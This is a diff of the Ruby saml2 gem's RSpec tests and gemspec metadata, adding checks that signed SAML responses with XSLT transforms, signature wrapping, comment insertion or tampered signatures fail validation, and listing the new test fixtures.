+    let(:sp) { sp_entity.roles.first }
 
     let(:request) do
       request = AuthnRequest.parse(fixture('authnrequest.xml'))
@@ -63,5 +64,213 @@ module SAML2
       expect(response2.assertions.length).to eq 1
       expect(response2.assertions.first.subject.name_id.id).to eq 'jacob'
     end
+
+    it "doesn't validate a response with XSLT transforms" do
+      response = Response.parse(fixture("xslt-transform-response.xml"))
+      expect(response).to be_valid_schema
+      expect(response.assertions.first.valid_signature?(fingerprint: 'bc71f7bacb36011694405dd0e2beafcc069de45f')).to eq false
+    end
+
+    it "doesn't validate a response with external URI reference in the signature" do
+      response = Response.parse(fixture("external-uri-reference-response.xml"))
+      expect(response).to be_valid_schema
+      expect(response.assertions.first.valid_signature?(fingerprint: 'bc71f7bacb36011694405dd0e2beafcc069de45f')).to eq false
+    end
+
+    it "can decrypt an EncryptedAssertion" do
+      # verifiable on the command line with:
+      # xmlsec1 decrypt --privkey-pem privatekey.key response_with_encrypted_assertion.xml
+      response = Response.parse(fixture("response_with_encrypted_assertion.xml"))
+      expect(response.decrypt(fixture("privatekey.key"))).to eq true
+      expect(response.assertions.length).to eq 1
+      expect(response.assertions.first.subject.name_id.id).to eq 'jacob'
+    end
+
+    it "allows non-ascii characters in attributes" do
+      response = Response.parse(fixture("test6-response.xml"))
+
+      attributes = response.assertions.first.attribute_statements.first.to_h
+      expect(attributes['eduPersonAffiliation']).to eq 'member'
+      expect(attributes['givenName']).to eq 'Canvas'
+      expect(attributes['displayName']).to eq 'Canvas Üser'
+    end
+
+    # see CVE-2017-11428
+    it "returns the full content of the NameID, even if a comment-insertion attack allows it to still validate the signature" do
+      response = Response.parse(fixture("test7-response.xml"))
+      # this file is a copy of test6-response.xml, with a comment inserted into the NameID
+
+      # the signature is still valid (we have to set a weird verification time because the response
+      # was signed with an expired signature)
+      expect(response.validate_signature(fingerprint: 'afe71c28ef740bc87425be13a2263d37971da1f9',
+                                         verification_time: Time.parse("2007-07-14 12:01:34Z"))).to eq []
+
+      # the comment is ignored, but doesn't truncate the nameid
+      expect(response.assertions.first.subject.name_id.id).to eq 'testuser@example.com'
+    end
+
+    describe "#validate" do
+      let (:idp_entity) do
+        idp_entity = Entity.new("issuer")
+        idp = IdentityProvider.new
+        idp.keys << KeyDescriptor.new(fixture("certificate.pem"))
+        idp_entity.roles << idp
+
+        idp_entity
+      end
+
+      before do
+        sp.private_keys << OpenSSL::PKey::RSA.new(fixture("privatekey.key"))
+      end
+
+      it "succeeds" do
+        response = Response.parse(fixture("response_signed.xml"))
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors).to eq []
+      end
+
+      it "checks the issuer" do
+        response = Response.parse(fixture("response_signed.xml"))
+        idp_entity.entity_id = 'someoneelse'
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors).to eq ["received unexpected message from 'issuer'; expected it to be from 'someoneelse'"]
+      end
+
+      it "complains about old message" do
+        response = Response.parse(fixture("response_signed.xml"))
+        sp_entity.valid_response?(response, idp_entity)
+        expect(response.errors.length).to eq 1
+        expect(response.errors.first).to match (/not_on_or_after .* is earlier than/)
+      end
+
+      it "complains about mismatched audience restriction" do
+        response = Response.parse(fixture("response_signed.xml"))
+        sp_entity.entity_id = 'someoneelse'
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors).to eq ["audience someoneelse not in allowed list of http://siteadmin.instructure.com/saml2"]
+      end
+
+      it "complains about no signature" do
+        response = Response.parse(fixture("response_with_encrypted_assertion.xml"))
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors).to eq ["neither response nor assertion were signed"]
+      end
+
+      it "complains if the signature has been tampered with" do
+        response = Response.parse(fixture("response_tampered_signature.xml"))
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors).to eq ["signature is invalid"]
+      end
+
+      it "complains if the trusted certificate isn't what signed the response" do
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "afe71c28ef740bc87425be13a2263d37971da1f9"
+
+        response = Response.parse(fixture("response_tampered_certificate.xml"))
+        sp_entity.valid_response?(response, idp_entity,
+                                  verification_time: Time.parse('2015-02-12T22:51:30Z'),
+                                  allow_expired_certificate: true)
+        expect(response.errors).to eq ["signature is invalid"]
+      end
+
+      it "complains when we don't have any trusted keys" do
+        response = Response.parse(fixture("response_signed.xml"))
+        idp_entity.identity_providers.first.keys.clear
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors).to eq ["could not find certificate to validate message"]
+      end
+
+      it "complains about a valid signature we don't trust" do
+        response = Response.parse(fixture("response_signed.xml"))
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.keys << KeyDescriptor.new(fixture("othercertificate.pem"))
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors.length).to eq 1
+        expect(response.errors.first).to start_with('error occurred during signature verification')
+      end
+
+      it "validates signature by fingerprint" do
+        response = Response.parse(fixture("response_signed.xml"))
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "1c:37:7d:30:c1:83:18:ea:20:8b:dc:d5:35:b6:16:85:17:58:f7:c9"
+
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors).to eq []
+      end
+
+      it "complains when we don't have any trusted fingerprints" do
+        response = Response.parse(fixture("response_signed.xml"))
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "1c:37:7d:30:c1:83:18:ea:20:8b:dc:d5:35:b6:16:85:17:58:f7:ca"
+
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-12T22:51:30Z'))
+        expect(response.errors).to eq ["no trusted certificate found"]
+      end
+
+      it "protects against xml signature wrapping attacks targeting nameid" do
+        response = Response.parse(fixture("xml_signature_wrapping_attack_response_nameid.xml"))
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "afe71c28ef740bc87425be13a2263d37971da1f9"
+
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2012-08-03T20:07:16Z'))
+        expect(response.errors.length).to eq 1
+        expect(response.errors.first.to_s).to eq "5:0: ERROR: Element '{urn:oasis:names:tc:SAML:2.0:assertion}Assertion': This element is not expected. Expected is one of ( {http://www.w3.org/2000/09/xmldsig#}Signature, {urn:oasis:names:tc:SAML:2.0:protocol}Extensions, {urn:oasis:names:tc:SAML:2.0:protocol}Status )."
+      end
+
+      it "protects against xml signature wrapping attacks targeting attributes" do
+        response = Response.parse(fixture("xml_signature_wrapping_attack_response_attributes.xml"))
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "afe71c28ef740bc87425be13a2263d37971da1f9"
+
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2012-08-03T20:07:16Z'))
+        expect(response.errors.length).to eq 1
+        expect(response.errors.first.to_s).to eq "30:0: ERROR: Element '{urn:oasis:names:tc:SAML:2.0:assertion}Subject': This element is not expected."
+      end
+
+      it "protects against xml signature wrapping attacks with duplicate IDs" do
+        response = Response.parse(fixture("xml_signature_wrapping_attack_duplicate_ids.xml"))
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "7292914fc5bffa6f3fe1e43fd47c205395fecfa2"
+
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2014-02-01T13:48:10.831Z'))
+        expect(response.errors.length).to eq 1
+        expect(response.errors.first.to_s).to eq "1:0: ERROR: Element '{urn:oasis:names:tc:SAML:2.0:assertion}Assertion', attribute 'ID': 'pfx77d6c794-8295-f1c4-298e-c25ecae8046d' is not a valid value of the atomic type 'xs:ID'."
+      end
+
+      it "protects against additional mis-signed assertions" do
+        response = Response.parse(fixture("xml_missigned_assertion.xml"))
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "c38e789fcfbbd4727bd8ff7fc365b44fc3596bda"
+
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse('2015-02-27T19:12:52Z'))
+        expect(response.errors.map(&:to_s)).to eq ["2:0: ERROR: Element '{http://www.w3.org/2000/09/xmldsig#}Signature': This element is not expected.",
+                                                  "43:0: ERROR: Element '{http://www.w3.org/2000/09/xmldsig#}Signature': This element is not expected."]
+      end
+
+      it "errors on expired certificate" do
+        response = Response.parse(fixture("test6-response.xml"))
+        idp_entity.entity_id = 'http://simplesamlphp.dev/simplesaml/saml2/idp/metadata.php'
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "afe71c28ef740bc87425be13a2263d37971da1f9"
+
+        sp_entity.valid_response?(response, idp_entity, verification_time: Time.parse("2012-08-03T20:07:15Z"))
+        expect(response.errors.length).to eq 1
+        expect(response.errors.first).to match(/certificate has expired/)
+      end
+
+      it "ignores expired certificate when requested" do
+        response = Response.parse(fixture("test6-response.xml"))
+        sp_entity.entity_id = 'http://shard-2.canvas.dev/saml2'
+        idp_entity.entity_id = 'http://simplesamlphp.dev/simplesaml/saml2/idp/metadata.php'
+        idp_entity.identity_providers.first.keys.clear
+        idp_entity.identity_providers.first.fingerprints << "afe71c28ef740bc87425be13a2263d37971da1f9"
+
+        sp_entity.valid_response?(response, idp_entity,
+                                  verification_time: Time.parse("2014-09-16T22:15:53Z"),
+                                  allow_expired_certificate: true)
+        expect(response.errors).to eq []
+      end
+
+    end
   end
 end

metadata

@@ -1,14 +1,14 @@
 --- !ruby/object:Gem::Specification
 name: saml2
 version: !ruby/object:Gem::Version
-  version: 2.1.0
+  version: 2.2.0
 platform: ruby
 authors:
 - Cody Cutrer
 autorequire: 
 bindir: bin
 cert_chain: []
-date: 2018-03-02 00:00:00.000000000 Z
+date: 2018-04-04 00:00:00.000000000 Z
 dependencies:
 - !ruby/object:Gem::Dependency
   name: nokogiri
@@ -184,11 +184,24 @@ files:
 - spec/fixtures/authnrequest.xml
 - spec/fixtures/certificate.pem
 - spec/fixtures/entities.xml
+- spec/fixtures/external-uri-reference-response.xml
 - spec/fixtures/identity_provider.xml
+- spec/fixtures/othercertificate.pem
 - spec/fixtures/privatekey.key
 - spec/fixtures/response_signed.xml
+- spec/fixtures/response_tampered_certificate.xml
+- spec/fixtures/response_tampered_signature.xml
 - spec/fixtures/response_with_attribute_signed.xml
+- spec/fixtures/response_with_encrypted_assertion.xml
 - spec/fixtures/service_provider.xml
+- spec/fixtures/test3-response.xml
+- spec/fixtures/test6-response.xml
+- spec/fixtures/test7-response.xml
+- spec/fixtures/xml_missigned_assertion.xml
+- spec/fixtures/xml_signature_wrapping_attack_duplicate_ids.xml
+- spec/fixtures/xml_signature_wrapping_attack_response_attributes.xml
+- spec/fixtures/xml_signature_wrapping_attack_response_nameid.xml
+- spec/fixtures/xslt-transform-response.xml
 - spec/lib/attribute_consuming_service_spec.rb
 - spec/lib/attribute_spec.rb
 - spec/lib/authn_request_spec.rb
@@ -242,12 +255,25 @@ test_files:
 - spec/lib/service_provider_spec.rb
 - spec/lib/identity_provider_spec.rb
 - spec/lib/authn_request_spec.rb
+- spec/fixtures/test3-response.xml
 - spec/fixtures/service_provider.xml
 - spec/fixtures/response_with_attribute_signed.xml
 - spec/fixtures/response_signed.xml
+- spec/fixtures/xml_signature_wrapping_attack_response_nameid.xml
+- spec/fixtures/response_tampered_signature.xml
+- spec/fixtures/xml_missigned_assertion.xml
 - spec/fixtures/certificate.pem
 - spec/fixtures/entities.xml
+- spec/fixtures/xml_signature_wrapping_attack_duplicate_ids.xml
+- spec/fixtures/othercertificate.pem
+- spec/fixtures/xslt-transform-response.xml
+- spec/fixtures/response_with_encrypted_assertion.xml
+- spec/fixtures/external-uri-reference-response.xml
 - spec/fixtures/authnrequest.xml
+- spec/fixtures/xml_signature_wrapping_attack_response_attributes.xml
 - spec/fixtures/FederationMetadata.xml
 - spec/fixtures/identity_provider.xml
+- spec/fixtures/response_tampered_certificate.xml
+- spec/fixtures/test7-response.xml
+- spec/fixtures/test6-response.xml
 - spec/fixtures/privatekey.key